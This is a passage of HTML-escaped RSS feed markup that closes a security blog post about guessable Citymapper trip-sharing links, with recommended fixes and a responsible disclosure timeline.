    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 66.21621621621621%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAANABQDASIAAhEBAxEB/8QAFwABAQEBAAAAAAAAAAAAAAAAAAIDBP/EABQBAQAAAAAAAAAAAAAAAAAAAAH/2gAMAwEAAhADEAAAAey9pEon/8QAFxABAAMAAAAAAAAAAAAAAAAAAQARIP/aAAgBAQABBQJIXn//xAAVEQEBAAAAAAAAAAAAAAAAAAAQEf/aAAgBAwEBPwGn/8QAFhEBAQEAAAAAAAAAAAAAAAAAAAEh/9oACAECAQE/AYx//8QAFBABAAAAAAAAAAAAAAAAAAAAIP/aAAgBAQAGPwJf/8QAGhAAAwEBAQEAAAAAAAAAAAAAAAERIWExQf/aAAgBAQABPyFtm96aYvfpSKDQlD//2gAMAwEAAgADAAAAENMv/8QAFxEAAwEAAAAAAAAAAAAAAAAAAAEhUf/aAAgBAwEBPxByXT//xAAXEQADAQAAAAAAAAAAAAAAAAAAARFx/9oACAECAQE/EErhg//EABoQAQEBAQEBAQAAAAAAAAAAAAERIQAxQVH/2gAIAQEAAT8QWUqoIZwt4FKmziQNzMeQOYN4JS6z350GL7+9/9k=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Oscar&quot;
        title=&quot;Oscar&quot;
        src=&quot;/static/63be53083c7cfc0e4fd11ed67245ba55/1c72d/oscar.jpg&quot;
        srcset=&quot;/static/63be53083c7cfc0e4fd11ed67245ba55/a80bd/oscar.jpg 148w,
/static/63be53083c7cfc0e4fd11ed67245ba55/1c91a/oscar.jpg 295w,
/static/63be53083c7cfc0e4fd11ed67245ba55/1c72d/oscar.jpg 590w,
/static/63be53083c7cfc0e4fd11ed67245ba55/a8a14/oscar.jpg 885w,
/static/63be53083c7cfc0e4fd11ed67245ba55/ef245/oscar.jpg 1112w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;The Fix&lt;/h3&gt;
&lt;p&gt;I wouldn’t classify this a bug or a security flaw, per se, but there is more Citymapper can do to prevent these types of attacks from being used in the wild:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;To protect future URLs increase the ID complexity either by increasing the length or including uppercase and special characters.&lt;/li&gt;
&lt;li&gt;Audit historical trips and remove the links to trips over a few days old, there would be no reason for the link to remain after a trip is complete.&lt;/li&gt;
&lt;li&gt;Remove first names or home labels from publicly facing API&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Disclosure&lt;/h3&gt;
&lt;p&gt;We e-mailed Citymapper’s operations team to raise the issue and their engineering team promptly responded and fixed the issue within a week – thank you Citymapper!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;7th November ‘17 — Research conducted&lt;/li&gt;
&lt;li&gt;9th November ‘17 — Vendor notified&lt;/li&gt;
&lt;li&gt;16th November ‘17 — Citymapper pushes out a patch, rendering this attack infeasible – seeking solutions to existing URLs and confidentiality issues.&lt;/li&gt;
&lt;li&gt;13th February ‘18 — Article published&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item></channel></rss>